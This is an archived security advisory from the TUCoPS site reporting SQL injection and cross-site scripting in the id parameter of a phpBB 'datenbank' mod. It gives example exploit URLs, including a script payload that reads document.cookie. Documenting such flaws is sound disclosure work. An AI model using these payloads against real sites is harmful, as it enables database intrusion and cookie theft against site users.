Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web BBS :: Frequently Exploited :: hack7424.htm

phpBB datenbank mod has XSS/SQL Injection in the id variable



phpBB datenbank mod has XSS/SQL Injection in the id variable



vulnerable mod:
datenbank

explaination:
you can pass SQL Injection / Cross Site Scripting (Commands) in the id variable inside the mod.php (mod-datenbank)

exploit:
http://[target]/phpBB/moddb/mod.php?id='[SQL Injection] 
http://[target]/phpBB/moddb/mod.php?id='><script>alert(documen t.cookie)
</script>

this bugs discovered by : neO
SGT SecurityGurus Team 
www.securitygurus.net 


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH